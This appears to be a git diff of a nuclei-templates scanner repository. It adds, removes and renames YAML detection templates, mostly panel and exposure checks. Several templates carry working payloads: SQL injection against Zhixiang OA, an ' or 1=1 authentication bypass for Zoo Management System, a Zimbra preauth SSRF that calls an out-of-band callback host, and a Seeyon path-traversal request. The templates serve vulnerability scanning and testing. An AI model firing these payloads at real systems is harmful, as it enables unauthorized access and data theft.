zentao-detect - -info: - name: Zentao detect - author: pikpikcu - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/zentao/index.php?mode=getconfig" - matchers: - - type: word - words: - - '"sessionName":"zentaosid"' - - '{"version":"' - part: body - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"version":"([v0-9.]+)"' diff --git a/nuclei-templates/Other/zentao-detect.yaml b/nuclei-templates/Other/zentao-detect.yaml new file mode 100644 index 0000000000..50e5214dbc --- /dev/null +++ b/nuclei-templates/Other/zentao-detect.yaml @@ -0,0 +1,23 @@ +id: zentao-detect +info: + name: Zentao detect + author: pikpikcu + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/zentao/index.php?mode=getconfig" + matchers: + - type: word + words: + - '"sessionName":"zentaosid"' + - '{"version":"' + part: body + condition: and + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version":"([v0-9.]+)"' diff --git a/nuclei-templates/Other/zhixiangOA-msg.aspx-sql.yaml b/nuclei-templates/Other/zhixiangOA-msg.aspx-sql.yaml deleted file mode 100644 index 974f5da473..0000000000 --- a/nuclei-templates/Other/zhixiangOA-msg.aspx-sql.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: zhixiangOA-SQL-Injection - -info: - name: zhixiang OA msglog.aspx SQL Injection - author: luckying - severity: high - reference: - - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: zhixiang,oa,sqli - -requests: - - method: GET - path: - - "{{BaseURL}}/mainpage/msglog.aspx?user=1'+and+(SELECT+sys.fn_sqlvarbasetostr(HashBytes('MD5',+'{{randstr}}')))%3d1+--" - headers: - Pragma: no-cache - - matchers: - - type: word - part: body - words: - - '{{md5("{{randstr}}")}}' \ No newline at end of file diff --git a/nuclei-templates/Other/zhixiangOA-msglog.aspx-sql.yaml b/nuclei-templates/Other/zhixiangOA-msglog.aspx-sql.yaml new file mode 100644 index 0000000000..84b42ba655 --- /dev/null +++ b/nuclei-templates/Other/zhixiangOA-msglog.aspx-sql.yaml @@ -0,0 +1,22 @@ +id: zhixiangOA-SQL-Injection + +info: + name: zhixiang OA msg.aspx SQL Injection + author: luckying + severity: high + reference: + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: zhixiang,oa,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/mainpage/msg.aspx?user=1'+and+(SELECT+sys.fn_sqlvarbasetostr(HashBytes('MD5',+'{{randstr}}')))%3d1+--" + headers: + Pragma: no-cache + + matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' \ No newline at end of file diff --git a/nuclei-templates/Other/zhiyuan-file-upload-11793.yaml b/nuclei-templates/Other/zhiyuan-file-upload-11796.yaml similarity index 100% rename from nuclei-templates/Other/zhiyuan-file-upload-11793.yaml rename to nuclei-templates/Other/zhiyuan-file-upload-11796.yaml diff --git a/nuclei-templates/Other/zhiyuan-oa-info-leak-11800.yaml b/nuclei-templates/Other/zhiyuan-oa-info-leak-11800.yaml index a05afe8089..668eacf45e 100644 --- a/nuclei-templates/Other/zhiyuan-oa-info-leak-11800.yaml +++ b/nuclei-templates/Other/zhiyuan-oa-info-leak-11800.yaml @@ -1,14 +1,17 @@ id: zhiyuan-oa-info-leak + info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md tags: zhiyuan,leak,disclosure + requests: - method: GET path: - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: - "application/x-msdownload" part: header condition: and + - type: status status: - 200 diff --git a/nuclei-templates/Other/zhiyuan-oa-session-leak-11801.yaml b/nuclei-templates/Other/zhiyuan-oa-session-leak-11801.yaml deleted file mode 100644 index deccd94de0..0000000000 --- a/nuclei-templates/Other/zhiyuan-oa-session-leak-11801.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: zhiyuan-oa-session-leak - -info: - name: Zhiyuan OA Session Leak - author: pikpikcu - severity: medium - description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. - reference: https://www.zhihuifly.com/t/topic/3345 - tags: zhiyuan,leak,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - - "" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zhiyuan-oa-session-leak-11802.yaml b/nuclei-templates/Other/zhiyuan-oa-session-leak-11802.yaml new file mode 100644 index 0000000000..590edda674 --- /dev/null +++ b/nuclei-templates/Other/zhiyuan-oa-session-leak-11802.yaml @@ -0,0 +1,21 @@ +id: zhiyuan-oa-session-leak +info: + name: Zhiyuan Oa Session Leak + author: pikpikcu + severity: medium + reference: https://www.zhihuifly.com/t/topic/3345 + tags: zhiyuan,leak,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll" + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zhiyuan-oa-unauthorized-11808.yaml b/nuclei-templates/Other/zhiyuan-oa-unauthorized-11808.yaml new file mode 100644 index 0000000000..77c78b3896 --- /dev/null +++ b/nuclei-templates/Other/zhiyuan-oa-unauthorized-11808.yaml @@ -0,0 +1,31 @@ +id: zhiyuan-oa-unauthorized + +info: + name: Zhiyuan Oa Unauthorized + author: pikpikcu + severity: low + reference: https://buaq.net/go-53721.html + tags: seeyon,unauth,zhiyuan + +requests: + - method: GET + path: + - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" + + matchers-condition: and + matchers: + + - type: word + words: + - "serverIdentifier" + - "companyName" + condition: and + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zhiyuan-oa-unauthorized.yaml b/nuclei-templates/Other/zhiyuan-oa-unauthorized.yaml deleted file mode 100644 index 7b0f97c9ef..0000000000 --- a/nuclei-templates/Other/zhiyuan-oa-unauthorized.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: zhiyuan-oa-unauthorized -info: - name: Zhiyuan Oa Unauthorized - author: pikpikcu - severity: low - reference: - - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan -requests: - - method: GET - path: - - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" - matchers-condition: and - matchers: - - type: word - words: - - "serverIdentifier" - - "companyName" - condition: and - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zimbra-preauth-ssrf-11810.yaml b/nuclei-templates/Other/zimbra-preauth-ssrf-11810.yaml new file mode 100644 index 0000000000..cb99a3ac7a --- /dev/null +++ b/nuclei-templates/Other/zimbra-preauth-ssrf-11810.yaml @@ -0,0 +1,23 @@ +id: zimbra-preauth-ssrf + +info: + name: Zimbra Collaboration Suite (ZCS) - SSRF + author: gy741 + severity: critical + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + reference: + - https://www.adminxe.com/2183.html + tags: zimbra,ssrf,oast + +requests: + - raw: + - | + GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/Other/zimbra-preauth-ssrf.yaml b/nuclei-templates/Other/zimbra-preauth-ssrf.yaml deleted file mode 100644 index 8b36af2c60..0000000000 --- a/nuclei-templates/Other/zimbra-preauth-ssrf.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: zimbra-preauth-ssrf -info: - name: Zimbra Collaboration Suite - Server-Side Request Forgery - author: gy741 - severity: medium - description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. - reference: - - https://www.adminxe.com/2183.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cve-id: CVE-2020-7796 - cwe-id: CWE-918 - tags: zimbra,ssrf,oast -requests: - - raw: - - | - GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 - Host: {{Hostname}} - Accept: */* - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/06/03 diff --git a/nuclei-templates/Other/zimbra-web-client-11814.yaml b/nuclei-templates/Other/zimbra-web-client.yaml similarity index 100% rename from nuclei-templates/Other/zimbra-web-client-11814.yaml rename to nuclei-templates/Other/zimbra-web-client.yaml diff --git a/nuclei-templates/Other/zip-backup-files-11818.yaml b/nuclei-templates/Other/zip-backup-files-11818.yaml new file mode 100644 index 0000000000..3d99b5bda0 --- /dev/null +++ b/nuclei-templates/Other/zip-backup-files-11818.yaml @@ -0,0 +1,57 @@ +id: zip-backup-files +info: + name: Compressed Web File + author: Toufik Airane & @dwisiswant0 + severity: medium + tags: exposure,backup +requests: + - method: GET + path: + - "{{BaseURL}}/{{Hostname}}.7z" + - "{{BaseURL}}/{{Hostname}}.bz2" + - "{{BaseURL}}/{{Hostname}}.gz" + - "{{BaseURL}}/{{Hostname}}.lz" + - "{{BaseURL}}/{{Hostname}}.rar" + - "{{BaseURL}}/{{Hostname}}.tar.gz" + - "{{BaseURL}}/{{Hostname}}.xz" + - "{{BaseURL}}/{{Hostname}}.zip" + - "{{BaseURL}}/{{Hostname}}.z" + - "{{BaseURL}}/{{Hostname}}.tar.z" + - "{{BaseURL}}/{{Hostname}}.db" + - "{{BaseURL}}/{{Hostname}}.sqlite" + - "{{BaseURL}}/{{Hostname}}.sqlitedb" + - "{{BaseURL}}/{{Hostname}}.sql.7z" + - "{{BaseURL}}/{{Hostname}}.sql.bz2" + - "{{BaseURL}}/{{Hostname}}.sql.gz" + - "{{BaseURL}}/{{Hostname}}.sql.lz" + - "{{BaseURL}}/{{Hostname}}.sql.rar" + - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" + - "{{BaseURL}}/{{Hostname}}.sql.xz" + - "{{BaseURL}}/{{Hostname}}.sql.zip" + - "{{BaseURL}}/{{Hostname}}.sql.z" + - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and + matchers: + - type: binary + binary: + - "377ABCAF271C" # 7z + - "314159265359" # bz2 + - "53514c69746520666f726d6174203300" # SQLite format 3. + - "1f8b" # gz tar.gz + - "526172211A0700" # rar RAR archive version 1.50 + - "526172211A070100" # rar RAR archive version 5.0 + - "FD377A585A0000" # xz tar.xz + - "1F9D" # z tar.z + - "1FA0" # z tar.z + - "4C5A4950" # lz + - "504B0304" # zip + condition: or + part: body + - type: regex + regex: + - "application/[-\\w.]+" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zip-backup-files-11819.yaml b/nuclei-templates/Other/zip-backup-files-11819.yaml deleted file mode 100644 index ce98d14bd2..0000000000 --- a/nuclei-templates/Other/zip-backup-files-11819.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: zip-backup-files -info: - name: Compressed Web File - author: Toufik Airane,dwisiswant0 - severity: medium - tags: exposure,backup -requests: - - method: GET - path: - - "{{BaseURL}}/{{Hostname}}.7z" - - "{{BaseURL}}/{{Hostname}}.bz2" - - "{{BaseURL}}/{{Hostname}}.gz" - - "{{BaseURL}}/{{Hostname}}.lz" - - "{{BaseURL}}/{{Hostname}}.rar" - - "{{BaseURL}}/{{Hostname}}.tar.gz" - - "{{BaseURL}}/{{Hostname}}.xz" - - "{{BaseURL}}/{{Hostname}}.zip" - - "{{BaseURL}}/{{Hostname}}.z" - - "{{BaseURL}}/{{Hostname}}.tar.z" - - "{{BaseURL}}/{{Hostname}}.db" - - "{{BaseURL}}/{{Hostname}}.sqlite" - - "{{BaseURL}}/{{Hostname}}.sqlitedb" - - "{{BaseURL}}/{{Hostname}}.sql.7z" - - "{{BaseURL}}/{{Hostname}}.sql.bz2" - - "{{BaseURL}}/{{Hostname}}.sql.gz" - - "{{BaseURL}}/{{Hostname}}.sql.lz" - - "{{BaseURL}}/{{Hostname}}.sql.rar" - - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" - - "{{BaseURL}}/{{Hostname}}.sql.xz" - - "{{BaseURL}}/{{Hostname}}.sql.zip" - - "{{BaseURL}}/{{Hostname}}.sql.z" - - "{{BaseURL}}/{{Hostname}}.sql.tar.z" - max-size: 500 # Size in bytes - Max Size to read from server response - matchers-condition: and - matchers: - - type: binary - binary: - - "377ABCAF271C" # 7z - - "314159265359" # bz2 - - "53514c69746520666f726d6174203300" # SQLite format 3. - - "1f8b" # gz tar.gz - - "526172211A0700" # rar RAR archive version 1.50 - - "526172211A070100" # rar RAR archive version 5.0 - - "FD377A585A0000" # xz tar.xz - - "1F9D" # z tar.z - - "1FA0" # z tar.z - - "4C5A4950" # lz - - "504B0304" # zip - condition: or - part: body - - type: regex - regex: - - "application/[-\\w.]+" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zipkin-exposure-11821.yaml b/nuclei-templates/Other/zipkin-exposure-11821.yaml new file mode 100644 index 0000000000..254c0f6add --- /dev/null +++ b/nuclei-templates/Other/zipkin-exposure-11821.yaml @@ -0,0 +1,18 @@ +id: zipkin-exposure + +info: + name: Zipkin Exposure + author: pdteam + severity: low + tags: panel,zipkin + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/zipkin/" + matchers: + - type: word + part: body + words: + - "webpackJsonpzipkin-lens" diff --git a/nuclei-templates/Other/zipkin-exposure.yaml b/nuclei-templates/Other/zipkin-exposure.yaml deleted file mode 100644 index d4e0e7b538..0000000000 --- a/nuclei-templates/Other/zipkin-exposure.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: zipkin-exposure -info: - name: Zipkin Exposure - author: pdteam - severity: low - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/zipkin/" - matchers: - - type: word - part: body - words: - - "webpackJsonpzipkin-lens" diff --git a/nuclei-templates/Other/zm-system-log-detect-11833.yaml b/nuclei-templates/Other/zm-system-log-detect.yaml similarity index 100% rename from nuclei-templates/Other/zm-system-log-detect-11833.yaml rename to nuclei-templates/Other/zm-system-log-detect.yaml diff --git a/nuclei-templates/Other/zmanda-default-login-11826.yaml b/nuclei-templates/Other/zmanda-default-login-11825.yaml similarity index 100% rename from nuclei-templates/Other/zmanda-default-login-11826.yaml rename to nuclei-templates/Other/zmanda-default-login-11825.yaml diff --git a/nuclei-templates/Other/zms-auth-bypass-11830.yaml b/nuclei-templates/Other/zms-auth-bypass-11830.yaml deleted file mode 100644 index 38a20c3a9a..0000000000 --- a/nuclei-templates/Other/zms-auth-bypass-11830.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: zms-auth-bypass - -info: - name: Zoo Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. - reference: https://www.exploit-db.com/exploits/48880 - tags: auth-bypass,zms - -requests: - - raw: - - | - POST /zms/admin/index.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/zms/admin/index.php - Cookie: PHPSESSID={{randstr}} - - username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= - - redirects: true - max-redirects: 1 - matchers-condition: and - matchers: - - type: regex - regex: - - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" - - "ZMS ADMIN" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zms-auth-bypass-11832.yaml b/nuclei-templates/Other/zms-auth-bypass-11832.yaml new file mode 100644 index 0000000000..3ec26ec197 --- /dev/null +++ b/nuclei-templates/Other/zms-auth-bypass-11832.yaml @@ -0,0 +1,33 @@ +id: zms-auth-bypass +info: + name: Zoo Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. + reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms +requests: + - raw: + - | + POST /zms/admin/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} + + username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= + redirects: true + max-redirects: 1 + matchers-condition: and + matchers: + - type: regex + regex: + - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" + - "ZMS ADMIN" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zoho-webhook-token-11835.yaml b/nuclei-templates/Other/zoho-webhook-token-11835.yaml old mode 100755 new mode 100644 index 3fccd958a2..f3aa557a4a --- a/nuclei-templates/Other/zoho-webhook-token-11835.yaml +++ b/nuclei-templates/Other/zoho-webhook-token-11835.yaml @@ -1,11 +1,9 @@ id: zoho-webhook-token - info: name: Zoho Webhook Disclosure author: Ice3man severity: info tags: exposure,token,zoho - requests: - method: GET path: diff --git a/nuclei-templates/Other/zte-panel-11840.yaml b/nuclei-templates/Other/zte-panel-11840.yaml deleted file mode 100644 index efaad36a63..0000000000 --- a/nuclei-templates/Other/zte-panel-11840.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: zte-panel - -info: - name: ZTE Panel - author: github.com/its0x08 - severity: info - tags: panel,zte - -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - "ZTE Corporation. All rights reserved. " - - '' - part: body - condition: and - - - type: word - words: - - "Mini web server 1.0 ZTE corp 2005." - part: header diff --git a/nuclei-templates/Other/zte-panel-11841.yaml b/nuclei-templates/Other/zte-panel-11841.yaml new file mode 100644 index 0000000000..2c56774979 --- /dev/null +++ b/nuclei-templates/Other/zte-panel-11841.yaml @@ -0,0 +1,34 @@ +id: zte-panel +info: + name: ZTE Panel + author: its0x08,idealphase + severity: info + description: | + ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. + reference: + - https://www.zte.com.cn/global/ + metadata: + verified: true + shodan-query: http.html:"ZTE Corporation" + tags: panel,zte +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - "ZTE Corporation. All rights reserved. " + - '' + condition: and + - type: word + part: header + words: + - "Mini web server 1.0 ZTE corp 2005." + extractors: + - type: regex + part: body + group: 1 + regex: + - '
    (.+)<\/font><\/div>' diff --git a/nuclei-templates/Other/zuul-panel-11842.yaml b/nuclei-templates/Other/zuul-panel-11842.yaml new file mode 100644 index 0000000000..938bce2b12 --- /dev/null +++ b/nuclei-templates/Other/zuul-panel-11842.yaml @@ -0,0 +1,29 @@ +id: zuul-panel +info: + name: Zuul Panel Detect + author: Yuzhe-zhang-0 + severity: info + reference: https://opendev.org/zuul/zuul + metadata: + shodan-query: http.favicon.hash:-1127895693 + tags: panel,zuul,cicd,oss +requests: + - method: GET + path: + - '{{BaseURL}}/api/tenants' + - '{{BaseURL}}/api/status' + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '"name":' + - '"projects":' + - '"queue":' + condition: and + - type: word + words: + - 'zuul_version' diff --git a/nuclei-templates/Other/zuul-panel-11843.yaml b/nuclei-templates/Other/zuul-panel-11843.yaml deleted file mode 100644 index 66226c1746..0000000000 --- a/nuclei-templates/Other/zuul-panel-11843.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: zuul-panel - -info: - name: Zuul Panel - author: Yuzhe-zhang-0 - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22zuul%22+http.favicon.hash%3A-1127895693 - tags: panel,Zuul,cicd - -requests: - - method: GET - redirects: true - max-redirects: 5 - path: - - '{{BaseURL}}/api/status' - - '{{BaseURL}}/api/tenants' - - matchers: - - type: word - words: - - 'zuul_version' - - - type: word - words: - - 'name' - - 'projects' - - 'queue'